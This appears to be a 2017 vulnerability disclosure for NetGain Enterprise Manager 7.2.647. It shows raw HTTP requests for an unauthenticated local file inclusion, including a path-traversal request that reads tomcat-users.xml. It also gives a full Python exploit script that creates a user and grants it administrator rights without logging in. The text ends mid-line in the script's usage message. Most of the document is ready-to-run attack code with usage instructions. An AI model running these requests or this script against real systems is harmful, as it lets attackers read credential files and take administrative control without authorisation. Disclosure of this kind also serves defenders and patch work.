NetGain Enterprise Manager: Authentication Bypass / Local File Inclusion
We discovered a vulnerability on NetGain Enterprise Manager (ver. 7.2.647) during a pentest. We believe that this vulnerability is quite rare and worth to share.
Local File Inclusion
Normal Request:
POST /u/jsp/log/download_do.jsp HTTP/1.1 Host: 192.168.0.21:8081 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.21:8081/u/index.jsp Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 18 filename=iossd.log
We can download another file with change the value on filename parameter and we can send this request without login.
Example:
POST /u/jsp/log/download_do.jsp HTTP/1.1 Host: 192.168.0.21:8081 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.21:8081/u/index.jsp Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 18 filename=../../tomcat/conf/tomcat-users.xml
Add User Account with Admin Privilege without Login
This application does not check the session on this request below, thus we can add user and assign admin privilege to it without authentication.
#!/usr/local/bin/python # Exploit Title: Add User Account with Admin Privilege without Login # Date: 2017-05-21 # Exploit Author: f3ci # Vendor Homepage: http://www.netgain-systems.com # Software Link: http://www.netgain-systems.com/free-edition-download/ # Version: <= v7.2.647 build 941 # Tested on: Windows 7 import requests import sys try: def create(): ip = str(sys.argv[1]) port = str(sys.argv[2]) user = str(sys.argv[3]) passwd = str(sys.argv[4]) print "\033[1;32m[+]\033[1;m Try to Create user" url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp" data= { 'new': "true", 'id': "", 'name': user, 'dname': "foobar", 'password': passwd, 'password2': passwd, 'description': "", 'emails': "[email protected]", 'mobileNumber': "000000", 'loginAttempts': "5", } response = requests.post(url, data=data) status = response.status_code if status == 200: print "\033[1;32m[+]\033[1;m Success!!" role() else: print "\033[91m[-]\033[91;m Create User Failed" def role(): ip = str(sys.argv[1]) port = str(sys.argv[2]) user = str(sys.argv[3]) passwd = str(sys.argv[4]) print "\033[1;32m[+]\033[1;m Get admin role" url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp" data= { 'name': "admin", 'description': "Administrator", 'users': [user,"admin"], } response = requests.post(url, data=data) status = response.status_code if status == 200: print "\033[1;32m[+]\033[1;m Success!!" print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd else: print "\033[91m[-]\033[91;m Get admin role Failed" create(); except: print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0]) print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081